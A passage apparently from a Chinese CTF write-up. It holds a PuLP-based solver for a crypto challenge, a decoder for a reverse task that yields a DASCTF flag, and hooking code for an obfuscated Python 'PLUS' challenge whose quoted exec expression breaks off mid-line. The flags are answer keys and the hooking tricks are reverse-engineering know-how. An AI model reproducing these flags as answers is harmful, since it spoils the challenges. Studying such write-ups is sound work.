49149083520860986347999638642521203694638543926268412252506202409928264008057293680911739, 61928543452515944227821341328519610289118377369966805029543374060001362257931063051283337, 26034686010634117456365197428263565888508379058874638049722777956606228875349494768464333, 22575361664007284844672869988496611743840885460407852367294603106678452465983850340616075, 5277710296315729515340699289696364579983061326373103852393445997608717896897776582649226, 41026280415964655893133692630917695383591534897730565249193593182856709572976319215782312, 42576811567092663463793104343826876000056433336299001691407500647350614658506348123032144, 9460712220621703680757148693759965586276268293009623381653950162638843479651313966731385, 53227154950001813528473624889792595772213742394210556870366113218985974010038790902221873, 24399916083355376664683771880160024740800452540011451348360314500423600890455449251468427, 63184033954694389348712641667241083268835683407091034903723040117494363407698634457995303, 12975871955576586187748818910402315160503046429297904021148539689171615692987602818416535, 36306589780701252736102424242529867813723865582890309408961429554588908206179967860110663, 57453960475172849605056556524048302622739788427107260305118528373983338580910769857952548, 31309116403625781607566203949479092393429111406038256071260564063440087909651923616139412, 10420137013450229220947743229434377933650765482824869066161773660332664803964824624568388]
l = [136, 161, 135, 152, 145, 141, 148, 144, 144, 136, 141, 158, 154, 152, 147, 163, 149, 149, 144, 151, 151, 139, 151, 152, 157, 149, 149, 147, 152, 155, 149, 146, 143, 151, 159, 146, 151, 156, 141, 129, 154, 147, 152, 146, 147, 145, 135, 136, 150, 138, 151, 148, 157, 123, 141, 140, 151, 121, 137, 145, 152, 149, 154, 128, 153, 147, 153, 140, 131, 140, 143, 122, 155, 155, 151, 133, 142, 140, 141, 155, 145, 132, 137, 138, 153, 143, 142, 134, 162, 147, 150, 141, 140, 166, 153, 153, 149, 149, 153, 146, 146, 156, 165, 143, 149, 150, 158, 157, 135, 140, 146, 149, 139, 159, 147, 147, 142, 146, 138, 143, 137, 170, 153, 149, 134, 145, 135, 149, 141, 138, 163, 146, 138, 144, 134, 145, 141, 156, 147, 146, 155, 163, 142, 150, 128, 157, 131, 156, 149, 155, 138, 140, 143, 155, 148, 169, 146, 147, 148, 146, 145, 156, 153, 138, 147, 145, 141, 155, 150, 153, 146, 159, 146, 138, 143, 156, 153, 155, 136, 149, 149, 142, 136, 144, 136, 148, 140, 151, 164, 151, 164, 143, 155, 141, 159, 141, 158, 162, 140, 146]
L = 295
w = [bin(ci)[2:].count('1') for ci in c]
def rot(m, l=1): # shift left
temp = bin(m)[2:].zfill(295)
return int(temp[l:] + temp[:l], 2)
for H in range(L + 1):
d = []
def check_hw_basics() -> bool:
for i in range(200):
dd,rr = divmod(w[i]+H-l[i],2)
if rr or not 0 <= dd <= min(w[i],H):
return False
d.append(dd)
return True
if not check_hw_basics():
continue
# constraint matrix := mt[i,j]: A[i,j] = 1
mt = []
for i in range(200):
ci_bin = bin(c[i])[2:].zfill(L)
supp = []
for j in range(L):
if ci_bin[j] == '1':
supp.append(j)
mt.append([(k + i) % L for k in supp]) #rot_l i bits
# pulp
pb = pulp.LpProblem("Rm")
s = [pulp.LpVariable(f"s_{j}",cat=pulp.LpBinary) for j in range(L)]
pb.add(pulp.lpSum(s) == H)
pb.extend(pulp.lpSum(s[j] for j in mt[i]) == d[i] for i in range(200))
st = pb.solve(pulp.PULP_CBC_CMD(msg=False))
def verify(m,cls,lls):
cur = m
for cc,cl in zip(cls,lls):
if bin(cc ^ cur).count('1') != cl:
return False
cur = rot(cur)
return True
if pulp.LpStatus[st] == 'Optimal':
mc = int(''.join(str(int(pulp.value(i))) for i in s), 2)
# verifier
if verify(mc,c,l):
print(mc.to_bytes(100).strip(b'\x00').decode())
break
# It'5_4_pr0bl3m_0f_L4ttice!_n0t_LFSR!!Reverse
GD1 | solved
用工具反编译
python还原逻辑得到flag
# 二进制字符串 a
a = "000001101000000001100101000010000011000001100111000010000100000001110000000100100011000100100000000001100111000100010111000001100110000100000101000001110000000010001001000100010100000001000101000100010111000001010011000010010111000010000000000001010000000001000101000010000001000100000110000100010101000100010010000001110101000100000111000001000101000100010100000100000100000001001000000001110110000001111001000001000101000100011001000001010111000010000111000010010000000001010110000001101000000100000001000010000011000100100101"
# 存储结果
result = ""
# 每次取12位
for i in range(0, len(a), 12):
bin_chunk = a[i:i+12]
if len(bin_chunk) < 12:
break # 确保长度足够
# 分割为三部分:各4位
hundreds_bin = bin_chunk[0:4] # 百位
tens_bin = bin_chunk[4:8] # 十位
units_bin = bin_chunk[8:12] # 个位
# 转为整数
hundreds = int(hundreds_bin, 2)
tens = int(tens_bin, 2)
units = int(units_bin, 2)
# 计算ASCII值
ascii_value = hundreds * 100 + tens * 10 + units
# 转为字符并拼接
result += chr(ascii_value)
# 输出结果
print("Result:", result)
#Result: DASCTF{xCuBiFYr-u5aP2-QjspKk-rh0LO-w9WZ8DeS}PLUS | solved
Python3.9,导入init.pyd里面的东西看一下,用到了unicorn和methodcaller之类,大概是vm
不执行指令,单独hook一下参数
from init import *
def null_emu(*args, **kwargs):
return b'0'
class Hook_m():
def __init__(self, *args, **kwargs):
print(f"methodcaller {args} {kwargs}")
def __call__(self, *args, **kwargs):
pass
m = Hook_m
b = null_emu
encrypt = exec(exit(int(3 + 4 + 4 + 2 + 1 + 3 + 5 + 7 + 1 + 6 + 5 + 7 + 1 + 9 + 7 + 3 + 6 + 9 + 3 + 8 + 4 + 5 + 8 + 6 + 5 + 4 + 9 + 7 + 5 + 8 + 8 + 3 + 1 + 5 + 9 + 3 + 1 + 8 + 1 + 9 + 7 + 5 + 9 + 5 + 8 + 5 + 3 + 7 + 3 + 6 + 1 + 3 + 6 + 7 + 6 + 5 + 9 + 5 + 1 + 3 + 7 + 1 + 3 + 1 + 7 + 4 + 9 + 4 + 5 + 5 + 7 + 6 + 4 + 7 + 1 + 8 + 3 + 4 + 3 + 1 + 2 + 2 + 9 + 6 + 5 + 1 + 7 + 8 + 8 + 5 + 2 + 4 + 8 + 2 + 6 + 6 + 5 + 4 + 5 + 6 + 8 + 8 + 4 + 4 + 1 + 9 + 6 + 3 + 8 + 2 + 8 + 1 + 4 + 2 + 9 + 4 + 3 + 9 + 9 + 7 + 6 + 9 + 1 + 2 + 2 + 2 + 5 + 1 + 1) + int(8 + 6 + 5 + 6 + 6 + 5 + 9 + 7 + 5 + 5 + 1 + 9 + 9 + 8 + 2 + 6 + 6 + 2 + 4 + 2 + 4 + 9 + 6 + 7 + 9 + 7 + 9 + 5 + 9 + 9 + 8 + 7 + 2 + 1 + 4 + 3 + 5 + 8 + 3 + 7 + 3 + 3 + 4 + 2 + 9 + 5 + 7 + 6 + 4 + 9 + 3 + 1 + 2 + 2 + 3 + 8 + 9 + 9 + 4 + 9 + 1 + 9 + 2 + 3 + 8 + 7 + 2 + 5 + 6 + 2 + 2 + 8 + 8 + 8 + 7 + 1 + 7 + 8 + 7 + 6 + 1 + 5 + 3 + 6 + 9 + 9 + 9 + 6 + 6) + int(5 + 2 + 7 + 9 + 9 + 7 + 3 + 6 + 2 + 9 + 6 + 9 + 1 + 3 + 3 + 4 + 1 + 7 + 1 + 4 + 5 + 4 + 8 + 1 + 6 + 2 + 5 + 4 + 9 + 1 + 7 + 8 + 8 + 1 + 8 + 5 + 2 + 4 + 1 + 3 + 9 + 1 + 4 + 3 + 6 + 7 + 1 + 9 + 7 + 4 + 9 + 8 + 6 + 7 + 2 + 1 + 8 + 3 + 8 + 9 + 5 + 6 + 9 + 4 + 6 + 2 + 5 + 4 + 7 + 4 + 2 + 4 + 8 + 4 + 1 + 4 + 1 + 4 + 3 + 4 + 5 + 3 + 9 + 8 + 7 + 7 + 4 + 1 + 8 + 2 + 7 + 3 + 8 + 2 + 7 + 7 + 4 + 6 + 1 + 9 + 5 + 6 + 9 + 2 + 5 + 6 + 1 + 6 + 3 + 9 + 5 + 7 + 2 + 1 + 3 + 9 + 8 + 4 + 4 + 8 + 9 + 4 + 3 + 6 + 9 + 9 + 2 + 1 + 4 + 4 + 4 + 9 + 7 + 1 + 5 + 4 + 4 + 8 + 7 + 3 + 8 + 8 + 7 + 9 + 9 + 2 + 3 + 9 + 3 + 9 + 5 + 9 + 8 + 2 + 1 + 1 + 1) + int(1 + 7 + 1 + 7 + 3 + 4 + 2 + 5 + 4 + 3 + 5 + 3 + 8 + 4 + 1 + 2 + 3 + 8 + 2 + 2 + 7 + 6 + 3 + 8 + 3 + 2 + 4 + 5 + 6 + 5 + 2 + 7 + 7 + 5 + 6 + 9 + 5 + 1 + 1 + 1 + 9 + 3 + 5 + 8 + 8 + 4 + 5 + 7 + 6 + 2 + 8 + 2 + 1 + 3 + 7 + 6 + 9 + 9 + 5 + 8 + 5 + 6 + 1 + 6 + 8 + 6 + 6 + 7 + 7 + 1 + 6 + 5 + 7 + 8 + 8 + 7 + 7 + 7 + 7 + 6 + 8 + 2 + 9 + 3 + 7 + 7 + 4 + 5 + 7 + 2 + 6) + int(5 + 2 + 6 + 6 + 7 + 9 + 3 + 2 + 9 + 2 + 7 + 8 + 6 + 4 + 5 + 1 + 9 + 5 + 3 + 3 + 1 + 6 + 2 + 3 + 4 + 5 + 2 + 3 + 4 + 2 + 2 + 3 + 8 + 6 + 9 + 1 + 3 + 2 + 7 + 8 + 9 + 1 + 4 + 6 + 3 + 1 + 3 + 4 + 5 + 9 + 9 + 8 + 6 + 4 + 4 + 4 + 3 + 7 + 9 + 9 + 7 + 5 + 7 + 6 + 3 + 4 + 8 + 6 + 8 + 1 + 9 + 5 + 5 + 1 + 8 + 7 + 9 + 7 + 8 + 4 + 5 + 7 + 4 + 2 + 7 + 3 + 8 + 5 + 7 + 3 + 5 + 3 + 7 + 2 + 4 + 5 + 2 + 8 + 2 + 9 + 9 + 3 + 1 + 6 + 4 + 8 + 8 + 3 + 8 + 4 + 5 + 1 + 6 + 7 + 8 + 2 + 9 + 6 + 4 + 4 + 5 + 7 + 9 + 3 + 8 + 5 + 4 + 4 + 1 + 2 + 3 + 9 + 5 + 1 + 6 + 2 + 4 + 2 + 5 + 5 + 4 + 4 + 3 + 4 + 3 + 6 + 3 + 7 + 6 + 2 + 4 + 6 + 2 + 7 + 7 + 6 + 8 + 5 + 5 + 2 + 4 + 1 + 6 + 5 + 8 + 8 + 4 + 8 + 9 + 5 + 5 + 2 + 2 + 7 + 5 + 6 + 9 + 1 + 5 + 9 + 1 + 4 + 7 + 8 + 1 + 1 + 1) + int(4 + 2 + 4 + 8 + 2 + 3 + 5 + 2 + 6 + 4 + 6 + 6 + 3 + 3 + 1 + 8 + 2 + 7 + 3 + 5 + 2 + 7 + 5 + 6 + 7 + 7 + 1 + 5 + 2 + 8 + 2 + 7 + 1 + 2 + 9 + 5 + 2 + 5 + 5 + 2 + 7 + 9 + 8 + 6 + 9 + 9 + 7 + 2 + 6 + 2 + 1 + 6 + 3 + 4 + 1 + 8 + 8 + 2 + 2 + 5 + 9 + 7 + 3 + 3 + 8 + 9 + 9 + 1 + 5 + 8 + 9 + 7 + 5 + 6 + 1 + 9 + 9 + 4 + 7 + 1 + 8 + 3 + 9 + 7 + 7 + 1 + 7 + 6 + 1 + 7 + 8 + 2 + 9 + 4 + 7 + 1 + 9 + 6 + 1 + 9 + 5 + 7 + 5 + 6 + 3 + 6 + 7 + 6 + 4 + 6 + 9 + 6 + 9 + 7 + 8 + 9 + 7 + 9 + 8 + 4 + 2 + 5 + 6 + 6 + 9 + 9 + 5 + 2 + 6 + 7 + 2 + 6 + 6 + 3 + 7 + 7 + 2 + 2 + 7 + 8 + 7 + 8 + 2 + 5 + 5 + 6 + 2 + 9 + 1 + 9 + 1 + 2 + 1 + 5 + 2 + 5 + 6 + 6 + 7 + 6 + 4 + 4 + 7 + 9 + 4 + 6 + 6 + 2 + 3) + int(9 + 8 + 8 + 7 + 6 + 6 + 5 + 1 + 2 + 6 + 8 + 6 + 5 + 4 + 5 + 8 + 3 + 5 + 4 + 5 + 6 + 9 + 1 + 7 + 2 + 3 + 3 + 6 + 6 + 4 + 3 + 3 + 7 + 9 + 5 + 1 + 5 + 9 + 3 + 1 + 3 + 7 + 9 + 4 + 5 + 7 + 9 + 5 + 6 + 7 + 1 + 3 + 5 + 5 + 6 + 8 + 8 + 9 + 1 + 8 + 9 + 4 + 2 + 7 + 9 + 4 + 8 + 4 + 3 + 5 + 5 + 1 + 7 + 1 + 3 + 9 + 2 + 5 + 2 + 6 + 1 + 9 + 5 + 5 + 9 + 2 + 7 + 9 + 6 + 2 + 6 + 8 + 8 + 5 + 7 + 4 + 7 + 4 + 8 + 1 + 8 + 9 + 6 + 3 + 2 + 5 + 3 + 7 + 1 + 8 + 5 + 2 + 7 + 9 + 5 + 6 + 3 + 9 + 7 + 6 + 6 + 3 + 6 + 6 + 2 + 6 + 5 + 3 + 9 + 5 + 5 + 5 + 5 + 4 + 4 + 5 + 6 + 9 + 6 + 9 + 8 + 3 + 3 + 5 + 9 + 9 + 8 + 5 + 8 + 9 + 1 + 2) + int(0) + int(4 + 1 + 3 + 9 + 1) + int(6 + 9 + 6 + 6 + 8 + 4 + 8 + 8 + 8 + 4 + 1 + 4 + 9 + 6 + 1 + 6 + 5 + 1 + 6 + 1 + 7 + 4 + 8 + 4 + 5 + 5 + 6 + 4 + 5 + 2 + 4 + 9 + 5 + 7 + 6 + 6 + 6 + 2 + 4 + 5 + 9 + 9 + 2 + 5 + 6 + 3 + 3 + 4 + 2 + 8 + 4 + 5 + 2 + 3 + 2 + 6 + 5 + 5 + 5 + 5 + 9 + 4 + 8 + 8 + 9 + 7 + 3 + 4 + 9 + 6 + 2 + 1 + 3 + 3 + 1 + 4 + 7 + 7 + 4 + 9 + 4 + 4 + 8 + 4 + 1 + 7 + 5 + 3 + 4 + 4 + 4 + 6 + 3 + 7 + 3 + 5 + 4 + 4 + 4 + 9 + 7 + 9 + 1 + 6 + 6 + 3 + 3 + 3 + 1 + 1 + 7 + 9 + 9 + 9 + 1 + 1 + 2 + 3 + 1 + 1 + 1) + int(5 + 1 + 3 + 6 + 4 + 8 + 4 + 6 + 7 + 4 + 2 + 4 + 6 + 5 + 9 + 3 + 2 + 6 + 1 + 7 + 8 + 9 + 2 + 9 + 2 + 2 + 9 + 3 + 3 + 8 + 1 + 2 + 7 + 2 + 4 + 6 + 4 + 8 + 6 + 7 + 5 + 1 + 1 + 4 + 5 + 3 + 6 + 5 + 8 + 1 + 5 + 3 + 1 + 9 + 3 + 1 + 1 + 4 + 9 + 5 + 9 + 6 + 9 + 2 + 6 + 3 + 6 + 8 + 1 + 2 + 4 + 3 + 9 + 3 + 4 + 7 + 5 + 7 + 3 + 5 + 9 + 5 + 1 + 4 + 2 + 4 + 4 + 1 + 7 + 8 + 6 + 4 + 4 + 8 + 5 + 5 + 1 + 5 + 8 + 5 + 8 + 4 + 2 + 2 + 1 + 5 + 5 + 6 + 6 + 6 + 4 + 6 + 7 + 3 + 1 + 1 + 7 + 4 + 5 + 9 + 8 + 5 + 5 + 4 + 3 + 1 + 8 + 4 + 9 + 4 + 5 + 7 + 6 + 3 + 3 + 1 + 9 + 7 + 9 + 5 + 4 + 4 + 9 + 1 + 8 + 4 + 1 + 1 + 2 + 1 + 4 + 6 + 3 + 9 + 5 + 5 + 7 + 1 + 1 + 3 + 7 + 2 + 5 + 3 + 9 + 7 + 9 + 3 + 8 + 1 + 7 + 1 + 4 + 6 + 2 + 8 + 5 + 1 + 1 + 6 + 6 + 7 + 5 + 2 + 8 + 9 + 7 + 7 + 9 + 5 + 7 + 5 + 6 + 6 + 7 + 8 + 3 + 5 + 1) + int(9 + 6 + 4 + 4 + 1 + 4 + 7 + 3 + 7 + 4 + 5 + 4 + 5 + 5 + 5 + 5 + 2 + 8 + 5 + 7 + 7 + 9 + 2 + 4 + 7 + 1 + 6 + 4 + 3 + 1 + 1 + 5 + 1 + 2 + 3 + 2 + 6 + 5 + 9 + 8 + 8 + 3 + 3 + 7 + 1 + 7 + 6 + 5 + 1 + 1 + 9 + 4 + 7 + 9 + 1 + 3 + 8 + 9 + 3 + 7 + 1 + 3 + 2 + 3 + 6 + 1 + 2 + 9 + 2 + 5 + 3 + 7 + 8 + 1 + 8 + 2 + 1 + 4 + 2 + 7 + 5 + 1 + 1 + 7 + 4 + 8 + 6 + 5 + 7 + 5 + 9 + 6 + 3 + 9 + 5 + 1 + 2 + 7 + 9 + 2 + 2 + 1 + 1 + 2 + 1) + int(1 + 2 + 2 + 6 + 7 + 9 + 1 + 8 + 5 + 5 + 2 + 8 + 1 + 5 + 1 + 8 + 6 + 8 + 6 + 2 + 7 + 2 + 5 + 2 + 4 + 4 + 2 + 1 + 2 + 5 + 7 + 8 + 3 + 6 + 1 + 6 + 4 + 6 + 8 + 6 + 5 + 8 + 7 + 7 + 5 + 7 + 5 + 4 + 6 + 1 + 1 + 7 + 9 + 3 + 1 + 1 + 1 + 1) + int(6 + 1 + 7 + 7 + 4 + 9 + 8 + 7 + 4 + 3 + 5 + 7 + 7 + 6 + 5 + 6 + 6 + 3 + 4 + 3 + 9 + 6 + 5 + 1 + 8 + 8 + 7 + 2 + 1 + 5 + 9 + 1 + 6 + 2 + 8 + 9 + 9 + 3 + 6 + 9 + 4 + 1 + 1 + 9 + 7 + 6 + 6 + 5 + 4 + 6 + 8 + 7 + 3 + 4 + 2 + 5 + 7 + 9 + 9 + 1 + 1 + 7 + 1 + 4 + 2 + 1 + 5 + 7 + 8 + 5 + 9 + 9 + 7 + 7 + 4 + 8 + 8 + 6 + 7 + 2 + 6 + 4 + 3 + 6 + 2 + 6 + 6 + 7 + 7 + 1 + 3 + 2 + 9 + 5 + 7 + 5 + 1 + 2 + 1 + 5 + 3 + 5 + 4 + 2 + 4 + 3 + 7 + 1 + 5 + 2 + 4 + 2 + 5 + 2 + 5 + 6 + 4 + 5 + 5 + 4 + 5 + 1 + 8 + 9 + 8 + 1 + 9 + 1 + 7 + 9 + 4 + 8 + 9 + 5 + 1 + 8 + 6 + 4 + 2 + 2 + 5 + 9 + 2 + 6 + 4 + 8 + 2 + 6 + 2 + 6 + 2 + 3 + 7 + 5 + 8 + 1 + 4 + 3 + 3 + 7 + 6 + 1 + 5 + 7 + 1 + 8 + 7 + 8 + 8 + 2 + 2 + 8 + 2 + 5 + 1 + 1 + 6 + 5 + 7 + 1 + 2 + 1) + int(3 + 4 + 8 + 8 + 2 + 1 + 6 + 3 + 6 + 2 + 6 + 6 + 1 + 4 + 1 + 8 + 3 + 6 + 1 + 3 + 2 + 5 + 2 + 1 + 7 + 7 + 7 + 8 + 1 + 8 + 8 + 5 + 2 + 9 + 9 + 3 + 9 + 2 + 9 + 8 + 8 + 6 + 7 + 6 + 2 + 3) + int(5 + 3 + 7 + 5 + 6 + 9 + 4 + 4 + 1 + 1 + 7 + 3 + 2 + 4 + 2 + 6 + 9 + 5 + 5 + 9 + 9 + 8 + 1 + 9 + 6 + 3 + 6 + 3 + 4 + 6 + 8 + 1 + 9 + 3 + 3 + 8 + 6 + 1 + 3 + 6 + 7 + 9 + 9 + 5 + 7 + 3 + 3 + 3 + 7 + 2 + 2 + 5 + 6 + 2 + 1 + 9 + 8 + 1 + 6 + 7 + 6 + 7 + 1 + 4 + 2 + 2 + 2 + 6 + 9 + 2 + 7 + 3 + 3 + 8 + 4 + 6 + 3 + 2 + 1) + int(4 + 3 + 8 + 1 + 5 + 4 + 9 + 9 + 9 + 5 + 1 + 9 + 1 + 4 + 4 + 4 + 1 + 9 + 1 + 8 + 9 + 7 + 4 + 5 + 1 + 2 + 6 + 8 + 9 + 6 + 4 + 3 + 9 + 7 + 6 + 3 + 1 + 4 + 4 + 3 + 3 + 1 + 2 + 9 + 3 + 9 + 7 + 5 + 7 + 7 + 3 + 5 + 7 + 9 + 2 + 2 + 2 + 8 + 3 + 2 + 1 + 8 + 5 + 8 + 1 + 3 + 8 + 1 + 2 + 1 + 4 + 8 + 7 + 6 + 4 + 6 + 6 + 5 + 1 + 6 + 8 + 3 + 5 + 8 + 2 + 8 + 7 + 6 + 6 + 1 + 9 + 3 + 3 + 1 + 2 + 9 + 4 + 5 + 1 + 1 + 7 + 2 + 2 + 3 + 1 + 3 + 5 + 4 + 6 + 4 + 4 + 2 + 9 + 4 + 2 + 7 + 8 + 8 + 8 + 7 + 1 + 5 + 6 + 2 + 6 + 3 + 5 + 9 + 1 + 8 + 7 + 7 + 5 + 4 + 3 + 7 + 5 + 2 + 2 + 1 + 5 + 9 + 3 + 5 + 8 + 6 + 7 + 2 + 5 + 1 + 2 + 8 + 2 + 2 + 4 + 8 + 8 + 6 + 7 + 3 + 8 + 4 + 8 + 6 + 2 + 5 + 5 + 1 + 1 + 7 + 5 + 7 + 2 + 6 + 7 + 6 + 2 + 4 + 4 + 7 + 8 + 5 + 3 + 6) + int(2 + 1 + 1 + 4 + 2 + 2 + 4 + 5 + 6 + 6 + 7 + 7 + 3 + 3 + 9 + 8 + 3 + 7 + 2 + 7 + 6 + 4 + 1 + 7 + 6 + 3 + 9 + 2 + 8 + 7 + 8 + 2 + 5 + 9 + 9 + 4 + 3 + 7 + 4 + 4 + 9 + 2 + 8 + 6 + 2 + 3 + 3 + 9 + 6 + 8 + 7 + 9 + 8 + 3 + 2 + 3 + 1 + 4 + 8 + 4 + 6 + 7 + 8 + 5 + 5 + 5 + 5 + 8 + 6 + 6 + 7 + 3 + 4 + 1 + 9 + 9 + 6 + 7 + 9 + 3 + 1 + 8 + 5 + 2 + 7 + 6 + 9 + 7 + 8 + 3 + 1 + 8 + 9 + 7 + 1 + 1 + 5 + 4 + 5 + 8 + 3 + 8 + 6 + 5 + 2 + 4 + 2 + 1 + 6 + 4 + 7 + 6 + 8 + 1 + 2 + 1 + 9 + 9 + 9 + 5 + 4 + 3 + 9 + 6 + 4 + 5 + 6 + 2 + 7 + 3 + 8 + 6 + 6 + 4 + 8 + 7 + 8 + 6 + 9 + 8 + 3 + 5 + 3 + 1 + 8 + 3 + 3 + 5 + 9 + 1 + 1 + 5 + 3 + 1 + 2 + 2 + 3 + 4 + 4 + 4 + 4 + 9 + 8 + 2 + 7 + 5 + 2 + 7 + 1) + int(7 + 8 + 9 + 3 + 3 + 1 + 1 + 3 + 3 + 5 + 2 + 3 + 3 + 5 + 8 + 8 + 5 + 1 + 2 + 7 + 3 + 3 + 2 + 1 + 2 + 8 + 2 + 2 + 5 + 9 + 1 + 1 + 1 + 5 + 7 + 9 + 7 + 2 + 9 + 5 + 8 + 1 + 9 + 7 + 7 + 5 + 1 + 2 + 3 + 4 + 8 + 3 + 8 + 4 + 5 + 4 + 9 + 8 + 5 + 9 + 8 + 2 + 1 + 3 + 3 + 1 + 2 + 4 + 3 + 2 + 4 + 3 + 9 + 9 + 7 + 2 + 7 + 8 + 1 + 1 + 4 + 4 + 5 + 6 + 7 + 2 + 4 + 5 + 7 + 6 + 4 + 4 + 3 + 2 + 2 + 3 + 2 + 7 + 8 + 5 + 8 + 5 + 5 + 4 + 2 + 5 + 3 + 2 + 5 + 7 + 1 + 1 + 2 + 4 + 3 + 9 + 2 + 2 + 1 + 5 + 1 + 6 + 2 + 9 + 4 + 2 + 2 + 7 + 8 + 4 + 7 + 7 + 3 + 6 + 3 + 7 + 9 + 9 + 8 + 6 + 7 + 4 + 2 + 4 + 7 + 3 + 8 + 4 + 1 + 2 + 8 + 5 + 7 + 9 + 9 + 1 + 7 + 5 + 7 + 4 + 4 + 1 + 4 + 1 + 3 + 4 + 7 + 5 + 3 + 8 + 2 + 8 + 5 + 2 + 2 + 8 + 5 + 3 + 3 + 4 + 6 + 5 + 7 + 2 + 3 + 1 + 9 + 7 + 3 + 2 + 9 + 4 + 6 + 3 + 6) + int(6 + 3 + 9 + 4 + 3 + 9 + 6 + 8 + 5 + 9 + 9 + 8 + 6 + 7 + 8 + 2 + 6 + 3 + 3 + 7 + 8 + 9 + 1 + 4 + 2 + 2 + 8 + 6 + 8 + 6 + 2 + 2 + 7 + 6 + 3 + 7 + 6 + 6 + 9 + 1 + 7 + 9 + 6 + 4 + 6 + 5 + 9 + 4 + 7 + 4 + 3 + 7 + 5 + 4 + 1 + 3 + 2 + 3 + 7 + 8 + 8 + 3 + 4 + 8 + 4 + 8 + 5 + 9 + 3 + 3 + 5 + 4 + 1 + 4 + 1 + 3 + 6 + 6 + 9 + 7 + 3 + 1 + 5 + 7 + 7 + 4 + 8 + 5 + 9 + 6 + 6 + 6 + 8 + 2 + 8 + 2 + 3 + 4 + 4 + 2 + 3 + 6 + 7 + 8 + 9 + 2 + 8 + 1 + 2 + 4 + 2 + 7 + 4 + 7 + 6 + 8 + 9 + 1 + 3 + 4 + 5 + 9 + 8 + 5 + 1 + 9 + 6 + 9 + 3 + 5 + 3 + 8 + 1 + 8 + 9 + 5 + 3 + 4 + 1 + 1 + 3 + 5 + 2 + 2 + 8 + 8 + 7 + 4 + 6 + 5 + 3 + 3 + 1 + 5 + 1 + 6 + 5 + 8 + 6 + 6 + 1 + 3 + 4 + 1 + 1) + int(0) + int(8 + 7 + 6 + 9 + 7 + 8 + 3 + 1 + 1) + int(4 + 4 + 1 + 6 + 5 + 6 + 4 + 1 + 4 + 6 + 3 + 3 + 1 + 3 + 4 + 9 + 7 + 2 + 7 + 1 + 9 + 6 + 9 + 5 + 9 + 8 + 8 + 6 + 9 + 1 + 3 + 2 + 8 + 6 + 4 + 6 + 3 + 9 + 6 + 3 + 7 + 7 + 7 + 6 + 2 + 7 + 4 + 8 + 5 + 6 + 6 + 9 + 9 + 8 + 5 + 3 + 2 + 7 + 6 + 3 + 7 + 7 + 9 + 1 + 2 + 6 + 9 + 7 + 7 + 7 + 6 + 9 + 3 + 4 + 5 + 9 + 5 + 2 + 1 + 2 + 1 + 9 + 4 + 8 + 1 + 1 + 5 + 9 + 6 + 3 + 9 + 6 + 8 + 1 + 1 + 8 + 1 + 6 + 8 + 4 + 7 + 7 + 6 + 3 + 4 + 4 + 3 + 7 + 9 + 1 + 3 + 6 + 3 + 8 + 2 + 8 + 8 + 8 + 4 + 5 + 6 + 3 + 3 + 8 + 4 + 5 + 8 + 4 + 9 + 8 + 2 + 8 + 3 + 7 + 5 + 2 + 6 + 2 + 1 + 3 + 4 + 3 + 6 + 5 + 8 + 6 + 5 + 3 + 7 + 2 + 7 + 5 + 6 + 3 + 8 + 4 + 2 + 2 + 7 + 1 + 7 + 2 + 9 + 5 + 1 + 1 + 2) + int(3 + 8 + 8 + 1 + 5 + 9 + 3 + 3 + 6 + 3 + 9 + 4 + 6 + 3 + 1 + 7 + 8 + 7 + 4 + 8 + 9 + 7 + 9 + 3 + 4 + 9 + 9 + 9 + 9 + 1 + 9 + 5 + 6 + 6 + 7 + 9 + 3 + 6 + 8 + 4 + 2 + 6 + 5 + 8 + 6 + 3 + 7 + 8 + 9 + 9 + 5 + 5 + 6 + 3 + 9 + 8 + 3 + 6 + 8 + 4 + 1 + 3 + 4 + 1 + 6 + 1 + 2 + 3 + 2 + 9 + 3 + 3 + 9 + 1 + 2 + 6 + 2 + 5 + 5 + 1 + 6 + 4 + 6 + 3 + 8 + 3 + 6 + 7 + 7 + 3 + 1 + 1 + 7 + 4 + 8 + 8 + 3 + 8 + 1 + 2 + 5 + 7 + 9 + 3 + 5 + 4 + 5 + 2 + 5 + 9 + 1 + 3 + 4 + 5 + 5 + 9 + 1 + 6 + 3 + 8 + 3 + 4 + 1 + 8 + 2 + 2 + 7 + 9 + 4 + 7 + 8 + 6 + 8 + 1 + 9 + 2 + 1 + 4 + 7 + 9 + 5 + 9 + 5 + 8 + 8 + 3 + 4 + 1 + 5 + 4 + 6 + 9 + 1 + 1 + 7 + 6 + 8 + 8 + 1) + int(7 + 2 + 3 + 5 + 8 + 4 + 4 + 9 + 1 + 7 + 7 + 4 + 1 + 8 + 8 + 7 + 6 + 6 + 6 + 4 + 2 + 4 + 7) + int(0) + int(8 + 9 + 4 + 3 + 7 + 1 + 6 + 3 + 3 + 2 + 5 + 2 + 1 + 7 + 5 + 2 + 9 + 3 + 9 + 4 + 1 + 2) + int(3 + 9 + 2 + 7 + 3 + 8 + 2 + 4 + 4 + 1 + 3 + 4 + 6 + 7 + 4 + 8 + 7 + 6 + 7 + 5 + 9 + 6 + 5 + 8 + 4 + 7 + 5 + 4 + 5 + 1 + 2 + 3 + 8 + 3 + 7 + 6 + 2 + 7 + 1 + 2 + 7 + 9 + 8 + 6 + 4 + 4 + 4 + 2 + 9 + 6 + 2 + 3 + 4 + 7 + 2 + 6 + 3 + 8 + 5 + 3 + 1 + 7 + 9 + 8 + 5 + 6 + 1 + 5 + 6 + 5 + 2 + 4 + 2 + 5 + 9 + 7 + 8 + 5 + 4 + 3 + 2 + 6 + 4 + 6 + 2 + 6 + 4 + 6 + 3 + 1 + 5 + 1 + 3 + 3 + 6 + 6 + 2 + 9 + 8 + 8 + 9 + 1 + 1 + 6 + 4 + 2 + 4 + 3 + 2 + 2 + 7 + 2 + 5 + 5 + 6 + 3 + 2 + 2 + 2 + 1) + int(9 + 5 + 1 + 2 + 2 + 4 + 5 + 1 + 7 + 4 + 2 + 3 + 6 + 7 + 8 + 3 + 6 + 7 + 6 + 6 + 9 + 7 + 8 + 4 + 6 + 1 + 3 + 5 + 6 + 4 + 4 + 4 + 3 + 5 + 1 + 6 + 8 + 9 + 3 + 3 + 4 + 2 + 3 + 2 + 7 + 6 + 4 + 3 + 5 + 2 + 4 + 1 + 4 + 6 + 5 + 4 + 4 + 7 + 4 + 7 + 6 + 8 + 5 + 8 + 3 + 5 + 1 + 2 + 1 + 3 + 6 + 3 + 1 + 8 + 5 + 9 + 9 + 9 + 8 + 7 + 4 + 6 + 9 + 2 + 7 + 3 + 3 + 6 + 5 + 9 + 6 + 1 + 8 + 4 + 3 + 5 + 7 + 2 + 4 + 4 + 7 + 2 + 9 + 5 + 9 + 8 + 7 + 6 + 1 + 4 + 6 + 2 + 4 + 7 + 2 + 8 + 5 + 7 + 4 + 7 + 8 + 1 + 4 + 